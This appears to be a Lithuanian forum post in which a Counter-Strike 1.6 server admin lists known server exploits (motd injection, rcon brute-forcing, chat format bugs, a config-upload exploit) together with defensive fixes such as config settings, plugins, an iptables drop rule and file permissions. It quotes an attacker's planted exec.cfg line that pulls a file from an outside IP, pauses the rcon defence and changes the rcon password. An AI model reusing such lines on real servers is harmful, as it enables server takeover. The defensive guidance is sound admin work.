Dproto naujausią versiją galite rasti paskutinėse temose http://amxmodx.lt/viewtopic.php?f=7&t=449 arba čia http://c-s.net.ua/forum/topic17628.html
0.2 Pasikeičia motd paveiksliukas ir išsijungia serveris
(Pastebėjau su naujausiom dproto versijomis) 2015-01-18
Problema: Nusiunčia paveikslėlį su scriptu ir išjungia serverį su kill komanda nusiūsta tiesiai į linux serverį.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Atsinaujinti dproto bei pasirūpinti kad server.cfg Fast Upload (Greitas atsiuntimas)
Code: Select all
sv_allowupload "0"
Reziume visos trys eilutės turėtų atrodyti taip:
Code: Select all
sv_allowdownload "1"sv_allowupload "0"sv_downloadurl "http://serverio_ip/cstrike/"
Problema: Naudoja UTF-8 kaip netinkamą formatą
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti fix'intą plmenu.amxxx pluginą. amxmodx/plugins
Nuoroda į plmenu.sma plugino kodą: http://www.amxmodx.lt/viewtopic.php?p=29881#p29881
Tiesiog nukopijuoti i tuščia .sma failą ir sukompiliuoti localiai.
Kitas variantas šitas moduliukas: http://www.failai.lt/us3ro44nm3zd/utf_fix.rar.htm (Orpeu)
1. AutobuyFix (Nežinau ar naujausias build 5787 susitvarko su tuo, todėl vistiek pateiksiu nes asmeniškai gaunu info loguos apie šio bugo naudojimą)
Problema: Keičia kliento autobuy.txt.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti autobuyfix.amxx pluginą. configs/plugins.ini
2 .HL Brute.
Problema: Bando atspėti jūsų rcon password, konsolės pvz:
Code: Select all
rcon 500661967 "pass" sv_contact "HL Brute 1.10"
Sprendimas: Yra keli variantai, pradėsiu nuo patikimiausio:
a) Ištrinti rcon password:
Code: Select all
rcon_password ""
Code: Select all
rcon_password "545asdwqdas5dwqhfjk5456"
d) Įdėti string drop'ą į iptables, nukopijuoti tiesiogiai į ssh langą (putty).
Code: Select all
iptables -I INPUT -p udp -m string --algo kmp --string "XBrute" -j DROP
Jeigu viską padarėte teisingai tai parašius
Code: Select all
iptables -L
Code: Select all
STRING match "XBrute" ALGO name kmp TO 65535
Code: Select all
apt-get update && apt-get install iptables/etc/init.d/iptables start
Bei įdėti limitą rcon spėjimų skaičiui:
Code: Select all
sv_rcon_banpenalty 0sv_rcon_minfailures 3sv_rcon_maxfailures 3sv_rcon_minfailuretime 30
Problema: Serverio floodinimas netikrais žaidėjais.
Pasėkmės: Serverio lagas/lūžimas.
Sprendimas: aarnas pamoka http://amxmodx.lt/viewtopic.php?f=19&t=2577
4. Color Transit chat Bug. Littel_Exploit
Problema: say %s %d chat buginimas.
Pasėkmės: Pakimba žaidėjai, nesimato dalies chat ir Hud tekstų.
Sprendimas: Įsidėti colored_translit.amxx configs/plugins.ini , colored_translit folderį į scripting, nes kitaip nekompiliuos.
5. Motd.txt keitimas, .cfg failų nusiuntimas į serverį. Raiz0 Exploit
Problema: Nusiunčia failus į serverį .cfg, kurie keičia rcon pasword. exec.cfg pavyzdys po Exploit panaudojimo:
Code: Select all
motdfile motd.txtmotd_write http://31.200.239.201/cstrike.exeamxx pause rcon_defencer amxx rcon_password Evil_guy
Sprendimas: Variantų gana nemažai, bet ne visi patikrinti bei ne 100% Patikimumas.
a) Visų pirma reikia atsikratyti į serverį atsiųstais failais, bet prieš ką nors darant būtinai išjunkite serverį.
Code: Select all
cstrike/addons/metamod
Code: Select all
cstrike/addons/amxmodx/configs/maps
Papildomai siųlyčiau patikrinti visas direktorijas ar kur nors kitur nėra įtartinų .cfg failų.
WinSCP: ALT+F7 search laukelyje, paieškokite exec.cfg, autoexec.cfg failų.
b) Keičiame failų/folderių priegos teises. cmod 0444 (0444 = 444).
Sudedame cmod 444 ant failų server.cfg motd.txt, bei ant direktorijų metamod, configs/maps.
Pavyzdys su WinSCP: Properties-Permissions, laukelyje parašyti 0444 arba palikti varneles prie R.
Pavyzdys su ssh(putty):
Code: Select all
chmod -R 444 metamod
Linux: engine_i686.7z
Win: swds_p2.7z
d) Išjungti motd langą.
https://forums.alliedmods.net/showthread.php?t=105242
e) Forume radau, kad kažkam neva padėjo tai, nors nelabai tikėtina:
Code: Select all
<html><frameset cols="*" framespacing="0" frameborder="no" border="0"><frame src="http://saitas.lt/folderis/motd.html" name="frame_main" /></frameset>
Jam taipogi reikalingas Orpheu modulis, kur parsiųsti minėjau anksčiau. Orpheu versija būtina 2.3, su 2.5 neveiks.
Failo nuoroda:
http://amxmodx.lt/viewtopic.php?f=19&t=3207
FS_Open failą dedam į orpheu folderį, filewatcher.cfg į amxmodx/configs, filewatcher.amxx į plugins folderį.
g) Jeigu asmuo jus hackinantis yra protingas, jis sugebės užblokuoti, išjungti pluginus, kuriais nuo to ginatės, tiesiog nuskaitydamas jūsų plugin direktoriją ir atsirinkdamas, kurie failai atlieka blokavimo funkciją, tai pasiūlymas būtų toks, keisti .amxx failų pavadinimus į nesukeliančius įtarimo, pvz:
Code: Select all
more_dmg.amxx fire_in_the_hole.amxx
Code: Select all
;pausecfg.amx
Prisegiau 2 failus: kitą motd, ir pluginuką jo naudojimui, .txt pavadinimą pakeitus, būtinai pakeiskite ir .sma faile pavadinimą:
Code: Select all
server_cmd("second_motd.txt")
Idėja būtų tokia, motd failą pasiekti nuotoliniu budu, kokiame nors ftp naudojantis pluginu, deja tokio neradau, bet manau tikrai įmanoma sukurti, pačiam deja kol kas neužtenka įgudzių. Galbūt mūsų geriausieji aarnas ir hleV padės šiuo klausimu.
Kaip ir minėjau pateikite savo variantus, kaip tvarkotės su įvairiais exploit.